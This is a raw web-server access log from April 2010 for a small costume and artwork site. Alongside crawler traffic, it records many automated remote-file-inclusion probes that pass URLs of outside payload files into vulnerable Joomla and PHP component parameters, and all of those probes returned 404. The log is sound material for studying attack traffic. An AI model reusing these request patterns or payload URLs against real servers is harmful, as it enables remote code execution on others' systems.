207.46.199.46 - - [09/Apr/2010:02:19:59 -0500] "GET /logs/access_log.1217203200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:02:20:48 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:20:48 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:23:43 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:23:43 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
128.121.61.35 - - [09/Apr/2010:02:27:30 -0500] "GET /logs/access_log.1220054400//modules/4nAlbum/public/displayCategory.php?basepath=http://www.go2play.com.hk/uc/data/avatar/000/00/00/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
128.121.61.35 - - [09/Apr/2010:02:28:07 -0500] "GET /logs/access_log.1225929600//modules/4nAlbum/public/displayCategory.php?basepath=http://www.go2play.com.hk/uc/data/avatar/000/00/00/id1.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:02:31:14 -0500] "GET //sources/join.php?FORM[url]=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:02:31:14 -0500] "GET /logs//sources/join.php?FORM[url]=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:02:31:14 -0500] "GET /logs/access_log.1219536000//sources/join.php?FORM[url]=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:02:31:14 -0500] "GET /logs/access_log.1223856000//sources/join.php?FORM[url]=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.13.139 - - [09/Apr/2010:02:31:59 -0500] "GET /logs/access_log.1232236800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.46 - - [09/Apr/2010:02:32:28 -0500] "GET /logs/access_log.1223424000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:02:36:29 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:36:29 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
189.78.160.75 - - [09/Apr/2010:02:38:16 -0500] "GET /logs/access_log.1222473600//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
189.78.160.75 - - [09/Apr/2010:02:38:19 -0500] "GET //index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
189.78.160.75 - - [09/Apr/2010:02:38:21 -0500] "GET /logs//index1.php?go=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
222.122.197.37 - - [09/Apr/2010:02:41:48 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:41:48 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
208.115.111.248 - - [09/Apr/2010:02:46:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
206.225.20.146 - - [09/Apr/2010:02:46:25 -0500] "GET /logs//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:46:25 -0500] "GET //common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:46:25 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:46:28 -0500] "GET /logs//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:46:28 -0500] "GET //common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:46:28 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:47 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:47 -0500] "GET /logs/access_log.1218067200%20%20//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:47 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:49 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:49 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:46:49 -0500] "GET /logs/access_log.1218067200%20%20//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:33 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:34 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:34 -0500] "GET /logs/access_log.1218067200//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:37 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:37 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [09/Apr/2010:02:47:38 -0500] "GET /logs/access_log.1218067200//modules/xfsection/modify.php?dir_module=http://www.pandory.com/birulangi/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
207.46.199.42 - - [09/Apr/2010:02:49:29 -0500] "GET /artwork/tombio.htm HTTP/1.1" 404 302 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.20.146 - - [09/Apr/2010:02:53:22 -0500] "GET /logs/access_log.1268265600//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:53:31 -0500] "GET /logs/access_log.1268265600//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:14 -0500] "GET //common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:18 -0500] "GET /logs//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:18 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:29 -0500] "GET //common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:29 -0500] "GET /logs//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:54:29 -0500] "GET /logs/access_log.1268265600%20%20//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:02:55:37 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:02:55:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.20.146 - - [09/Apr/2010:02:56:19 -0500] "GET /error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:56:19 -0500] "GET /logs/access_log.1206489600%20%20/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:56:19 -0500] "GET /logs/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:56:40 -0500] "GET /logs/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:56:40 -0500] "GET /error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:56:40 -0500] "GET /logs/access_log.1206489600%20%20/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:57:52 -0500] "GET /logs/access_log.1268265600//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:02:57:55 -0500] "GET /logs/access_log.1268265600//common/db.php?commonpath=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.13.41 - - [09/Apr/2010:03:01:58 -0500] "GET /logs/access_log.1154995200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:03:02:10 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:02:10 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
189.78.160.75 - - [09/Apr/2010:03:04:55 -0500] "GET /logs/access_log.1220054400//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
189.78.160.75 - - [09/Apr/2010:03:04:57 -0500] "GET //index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.46.204.229 - - [09/Apr/2010:03:04:59 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
189.78.160.75 - - [09/Apr/2010:03:05:02 -0500] "GET /logs//index.php?redir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.195.112.180 - - [09/Apr/2010:03:05:02 -0500] "GET /artwork/furniture.htm HTTP/1.0" 200 1004 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.234 - - [09/Apr/2010:03:05:59 -0500] "GET /logs/access_log.1202256000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:03:07:18 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:07:18 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.20.146 - - [09/Apr/2010:03:07:46 -0500] "GET /logs/access_log.1206489600/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.20.146 - - [09/Apr/2010:03:07:51 -0500] "GET /logs/access_log.1206489600/error.php?dir=http://boxwww.co.kr/shop/session/security/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.204.242 - - [09/Apr/2010:03:08:29 -0500] "GET /logs/access_log.1211068800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
184.73.9.35 - - [09/Apr/2010:03:12:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.9.35 - - [09/Apr/2010:03:12:16 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.9.35 - - [09/Apr/2010:03:13:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
184.73.9.35 - - [09/Apr/2010:03:13:51 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )"
207.46.204.195 - - [09/Apr/2010:03:13:58 -0500] "GET /logs/access_log.1224892800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:03:14:09 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:14:09 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
72.30.161.241 - - [09/Apr/2010:03:23:34 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.241 - - [09/Apr/2010:03:23:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [09/Apr/2010:03:24:34 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:36 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:39 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:41 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3962 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:43 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 3450 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:45 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:48 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 3414 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:50 -0500] "GET /costume/thmb6.htm HTTP/1.1" 200 3210 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:53 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2938 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [09/Apr/2010:03:24:55 -0500] "GET /costume/thmb8.htm HTTP/1.1" 200 3054 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
222.122.197.37 - - [09/Apr/2010:03:25:55 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:25:55 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.46.195.240 - - [09/Apr/2010:03:28:57 -0500] "GET /logs/access_log.1191024000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.207 - - [09/Apr/2010:03:29:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.197.37 - - [09/Apr/2010:03:30:37 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:30:37 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:37:02 -0500] "GET //components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:37:02 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
203.251.225.101 - - [09/Apr/2010:03:37:54 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:37:54 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:37:55 -0500] "GET /logs/access_log.1218067200//modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:38:04 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:38:04 -0500] "GET /logs/access_log.1218067200//modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 340 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:38:04 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://come.kr/bbs/data/kidschool/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:03:39:52 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:39:58 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.46.13.98 - - [09/Apr/2010:03:39:59 -0500] "GET /logs/access_log.1249084800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.191.227.2 - - [09/Apr/2010:03:40:34 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%22Mambo?? HTTP/1.1" 404 323 "-""libwww-perl/5.831"
207.191.227.2 - - [09/Apr/2010:03:40:35 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=%22Mambo?? HTTP/1.1" 404 328 "-""libwww-perl/5.831"
195.225.106.11 - - [09/Apr/2010:03:43:37 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:03:43:37 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:03:43:37 -0500] "GET /logs/access_log.1219708800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:03:43:43 -0500] "GET /logs/access_log.1220054400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.217.30.214 - - [09/Apr/2010:03:46:24 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; snft internet; FunWebProducts)"
174.142.68.135 - - [09/Apr/2010:03:46:40 -0500] "GET /logs/includes/useragent.inc.php?prefix=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:03:46:40 -0500] "GET /logs/access_log.1219449600%20%20/includes/useragent.inc.php?prefix=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
174.142.68.135 - - [09/Apr/2010:03:46:41 -0500] "GET /includes/useragent.inc.php?prefix=http://www.waleed-security.com/wp-content/uploads/2006/09/a?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.122.197.37 - - [09/Apr/2010:03:46:45 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
222.122.197.37 - - [09/Apr/2010:03:46:48 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.turismonellemarche.it/images/baru.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
203.251.225.101 - - [09/Apr/2010:03:50:31 -0500] "GET //include/write.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:50:33 -0500] "GET /logs/access_log.1217203200%20%20//include/write.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
203.251.225.101 - - [09/Apr/2010:03:50:34 -0500] "GET /logs//include/write.php?dir=http://jx.fileave.com/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:03:52:02 -0500] "GET //administrator/components/com_babackup/classes/Tar.php//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 393 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:03:52:02 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 398 "-""Mozilla/5.0"
62.149.228.44 - - [09/Apr/2010:03:52:02 -0500] "GET /logs/access_log.1268956800//administrator/components/com_babackup/classes/Tar.php//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 420 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:03:52:15 -0500] "GET /logs/access_log.1220054400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
195.225.106.11 - - [09/Apr/2010:03:52:16 -0500] "GET /logs/access_log.1219708800/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.backto.co.kr/data/faq/respon1.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
